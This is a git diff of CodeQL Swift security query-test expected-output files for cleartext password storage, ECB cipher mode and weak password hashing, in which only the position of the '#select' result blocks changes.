+++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextStoragePreferences.expected
@@ -1,19 +1,3 @@ -#select -| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | -| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | -| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | -| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. 
It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | -| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | -| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | -| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | -| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:49:28:49:30 | .password | .password | -| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. 
| testUserDefaults.swift:55:10:55:10 | passwd | passwd | -| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | -| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | -| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | provenance | | 
@@ -61,3 +45,19 @@ nodes | testUserDefaults.swift:82:28:82:40 | .value | semmle.label | .value | subpaths | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:74:7:74:7 | self | file://:0:0:0:0 | .value | testUserDefaults.swift:82:28:82:40 | .value | +#select +| testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | This operation stores 'password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:28:12:28:12 | password | password | +| testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | testNSUbiquitousKeyValueStore.swift:42:40:42:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:41:24:41:24 | x | x | +| testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | testNSUbiquitousKeyValueStore.swift:45:40:45:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | This operation stores '.password' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:49:40:49:42 | .password | .password | +| testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | testNSUbiquitousKeyValueStore.swift:59:40:59:40 | x | This operation stores 'x' in iCloud. It may contain unencrypted sensitive data from $@. 
| testNSUbiquitousKeyValueStore.swift:55:10:55:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | testNSUbiquitousKeyValueStore.swift:60:40:60:40 | y | This operation stores 'y' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:56:10:56:10 | passwd | passwd | +| testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | testNSUbiquitousKeyValueStore.swift:61:40:61:40 | z | This operation stores 'z' in iCloud. It may contain unencrypted sensitive data from $@. | testNSUbiquitousKeyValueStore.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | testUserDefaults.swift:28:15:28:15 | password | This operation stores 'password' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:28:15:28:15 | password | password | +| testUserDefaults.swift:42:28:42:28 | x | testUserDefaults.swift:41:24:41:24 | x | testUserDefaults.swift:42:28:42:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:41:24:41:24 | x | x | +| testUserDefaults.swift:45:28:45:28 | y | testUserDefaults.swift:44:10:44:22 | call to getPassword() | testUserDefaults.swift:45:28:45:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:44:10:44:22 | call to getPassword() | call to getPassword() | +| testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | testUserDefaults.swift:49:28:49:30 | .password | This operation stores '.password' in the user defaults database. It may contain unencrypted sensitive data from $@. 
| testUserDefaults.swift:49:28:49:30 | .password | .password | +| testUserDefaults.swift:59:28:59:28 | x | testUserDefaults.swift:55:10:55:10 | passwd | testUserDefaults.swift:59:28:59:28 | x | This operation stores 'x' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:55:10:55:10 | passwd | passwd | +| testUserDefaults.swift:60:28:60:28 | y | testUserDefaults.swift:56:10:56:10 | passwd | testUserDefaults.swift:60:28:60:28 | y | This operation stores 'y' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:56:10:56:10 | passwd | passwd | +| testUserDefaults.swift:61:28:61:28 | z | testUserDefaults.swift:57:10:57:10 | passwd | testUserDefaults.swift:61:28:61:28 | z | This operation stores 'z' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:57:10:57:10 | passwd | passwd | +| testUserDefaults.swift:82:28:82:40 | .value | testUserDefaults.swift:82:28:82:31 | .password | testUserDefaults.swift:82:28:82:40 | .value | This operation stores '.value' in the user defaults database. It may contain unencrypted sensitive data from $@. | testUserDefaults.swift:82:28:82:31 | .password | .password | diff --git a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected index e1dcb0bbd955..32c4082abb92 100644 --- a/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected +++ b/swift/ql/test/query-tests/Security/CWE-327/ECBEncryption.expected 
@@ -1,13 +1,3 @@ -#select -| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | -| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | -| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. 
| test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | -| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | -| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | -| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | edges | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | provenance | | | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | provenance | | 
@@ -28,3 +18,13 @@ nodes | test.swift:72:42:72:46 | call to ECB.init() | semmle.label | call to ECB.init() | | test.swift:73:42:73:58 | call to getECBBlockMode() | semmle.label | call to getECBBlockMode() | subpaths +#select +| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | +| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | +| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. 
| test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | +| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected index 2b0eed8d0c2b..273f26164fd7 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected 
@@ -1,52 +1,3 @@ -#select -| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | -| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | -| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | -| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | -| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | -| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | -| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | -| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. 
| testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | -| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | -| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | -| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | -| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | -| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | -| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | -| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. 
| testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | -| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | -| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | -| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | -| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | -| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | -| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | -| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. 
| testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | -| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | -| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | -| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | -| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | -| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | -| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | -| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | edges | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:38:224:53 | .utf8 | provenance | | | testCryptoKit.swift:224:38:224:53 | .utf8 | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | provenance | | 
